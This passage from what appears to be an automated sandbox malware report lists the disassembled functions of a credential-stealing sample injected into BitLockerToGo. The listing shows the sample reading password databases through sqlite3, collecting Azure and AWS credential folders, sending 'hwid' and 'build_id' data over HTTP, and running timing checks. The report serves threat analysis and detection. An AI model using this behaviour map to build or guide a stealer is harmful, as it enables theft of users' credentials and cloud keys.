                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$Filelstrcat$Processlstrcpy$AllocateFree$CloseCopyCreateDeleteExistsHandlePathReadSizeSleepSystemTimelstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: _passwords.db
                                                                                                                                                                                                                                                                                                                    • API String ID: 3315713884-1485422284
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c4eb7071f34a0458cc66daec1910e400bd8a996518734eef12ad28e5de29069e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e0cf33df8c18b05428cd65028ae2cbd20be891e81100c6e284c87ccc097abfd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4eb7071f34a0458cc66daec1910e400bd8a996518734eef12ad28e5de29069e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB614A32900148BBCB10BFB9EC4AEEE7B78FF05701F104524FA51E3262DA755A568B92
                                                                                                                                                                                                                                                                                                                    Function 008F8705 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8669
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(?), ref: 008F8674
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: StrStrA.SHLWAPI(00000000,?), ref: 008F8689
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(?), ref: 008F8698
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8615: lstrlen.KERNEL32(00000000), ref: 008F86B1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F87EF
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8848
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F88A8
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8901
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8917
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F892D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F893F
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 008F894E
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F87E7
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F890F
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F88A0
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8925
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F88F9
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8840
                                                                                                                                                                                                                                                                                                                    • sqlo.dll, xrefs: 008F8A1C
                                                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 008F89FD
                                                                                                                                                                                                                                                                                                                    • ERROR, xrefs: 008F8937
                                                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6, xrefs: 008F8A2E
                                                                                                                                                                                                                                                                                                                    • sqlite3.dll, xrefs: 008F89B7
                                                                                                                                                                                                                                                                                                                    • sqlite3.dll, xrefs: 008F89EB
                                                                                                                                                                                                                                                                                                                    • sqlo.dll, xrefs: 008F8A4D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6$sqlite3.dll$sqlite3.dll$sqlo.dll$sqlo.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 2840494320-2782864256
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 799db39285ea4ef3349ad1980ad6587ee0ca499715c6fdd33b6a52245f54174b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b24225eb94aca8852b5cedf19cc56465cb04c57bc58d82b70c1a4daf8f93f51e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 799db39285ea4ef3349ad1980ad6587ee0ca499715c6fdd33b6a52245f54174b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F91E431E4411DAACB10FBB9EC069ECBB74FF41744F514461BA04F7262DB706F9A8A86
                                                                                                                                                                                                                                                                                                                    Function 008E1656 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 2417 8e1656-8e168e GetTempPathW 2418 8e17f9-8e17fb 2417->2418 2419 8e1694-8e16bb wsprintfW 2417->2419 2421 8e17ea-8e17f8 call 8fe88c 2418->2421 2420 8e16c0-8e16e5 CreateFileW 2419->2420 2420->2418 2423 8e16eb-8e173e GetProcessHeap RtlAllocateHeap _time64 srand rand call 905490 WriteFile 2420->2423 2423->2418 2427 8e1744-8e174a 2423->2427 2427->2418 2428 8e1750-8e178c call 905490 CloseHandle CreateFileW 2427->2428 2428->2418 2431 8e178e-8e17a1 ReadFile 2428->2431 2431->2418 2432 8e17a3-8e17a9 2431->2432 2432->2418 2433 8e17ab-8e17e1 call 905490 GetProcessHeap RtlFreeHeap CloseHandle 2432->2433 2433->2420 2436 8e17e7-8e17e9 2433->2436 2436->2421
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 008E1686
                                                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 008E16AC
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 008E16D6
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 008E16EE
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E16F5
                                                                                                                                                                                                                                                                                                                    • _time64.MSVCRT ref: 008E16FE
                                                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 008E1705
                                                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 008E170E
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E171E
                                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 008E1736
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1753
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008E1761
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 008E177D
                                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 008E1799
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E17AE
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E17B8
                                                                                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 008E17BF
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008E17CB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                                                                                    • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d7931a1f788848d2f8455e4ea23b4af0a1ce5dc9e0a906f8582238d23ae89bc6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d190cdd3be4f5ff70cbeaa6fc68824d7de0e2207af07e8abed482e37cc5f8dd1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7931a1f788848d2f8455e4ea23b4af0a1ce5dc9e0a906f8582238d23ae89bc6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41A1B1E14258BBDB209B72EC4DFEB7B7DEB8D710F004599F20AD10A1DA314A90DE60
                                                                                                                                                                                                                                                                                                                    Function 008E4A56 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E4AF5
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E4B13
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E4CAB
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E4CEF
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E4D1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00917A2B,",build_id,0091898C,------,00918980,",hwid,0091896C,------), ref: 008E5016
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000000), ref: 008E5029
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,?,00000000), ref: 008E5037
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008E5094
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008E509F
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E50B6
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E50C2
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                                                                                    • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                                                                                    • API String ID: 3006978581-3960666492
                                                                                                                                                                                                                                                                                                                    • Opcode ID: cb1caf1a736a09b1c1e25d543328e23be358b8e9b89446ab2d199bb9f985225f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a2a964ecaa71d8417dac6e7b75469e4d44c0cde81a7b5fb6c608665d1e957d9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb1caf1a736a09b1c1e25d543328e23be358b8e9b89446ab2d199bb9f985225f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26029131D1506E9ACB20EB29DC42AEDB7B8FF04304F0554E1A648B3266DA757F868FD1
                                                                                                                                                                                                                                                                                                                    Function 008F3463 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 008F346A
                                                                                                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000), ref: 008F347B
                                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008F348C
                                                                                                                                                                                                                                                                                                                    • CoCreateInstance.COMBASE(00913F70,00000000,00000001,00913EA0,?), ref: 008F34A6
                                                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008F34DC
                                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 008F3537
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: __EH_prolog3_catch.LIBCMT ref: 008F33BA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: CoCreateInstance.COMBASE(00914220,00000000,00000001,0091C180,?), ref: 008F33DD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysAllocString.OLEAUT32(?), ref: 008F33EA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: _wtoi64.MSVCRT ref: 008F341D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysFreeString.OLEAUT32(?), ref: 008F3436
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F33B3: SysFreeString.OLEAUT32(00000000), ref: 008F343D
                                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 008F3566
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008F3572
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F3579
                                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 008F35B8
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F35A5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$CreateFreeHeapInitializeInstanceTimeVariant$AllocAllocateBlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                                                                                    • API String ID: 2464074849-461178377
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3f9c13d3d19219111eb4e32159846cf5593d67fe34197151716fc0d64b1a7d9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f9733de8a8e3361792fc44e9f10340731b7d9364fbb3d7be8c15d307ae3e219f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3f9c13d3d19219111eb4e32159846cf5593d67fe34197151716fc0d64b1a7d9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE414871A44209BBDB209BE5DC49EEFBBBCFFC9B14F104509F611E6290C6749A81CB20
                                                                                                                                                                                                                                                                                                                    Function 008F820C Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F8231
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F8250
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.azure\), ref: 008F826D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7D67
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindFirstFileA.KERNEL32(?,?), ref: 008F7D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF4), ref: 008F7D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF8), ref: 008F7DB9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7DE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,009176B6), ref: 008F7DF4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E11
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: PathMatchSpecA.SHLWAPI(?,?), ref: 008F7E3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?), ref: 008F7E74
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B10), ref: 008F7E86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7E99
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B14), ref: 008F7EAB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7EBF
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F82A5
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F82C7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,\.aws\), ref: 008F82E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E28
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: CopyFileA.KERNEL32(?,?,00000001), ref: 008F7F78
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: DeleteFileA.KERNEL32(?), ref: 008F7FEC
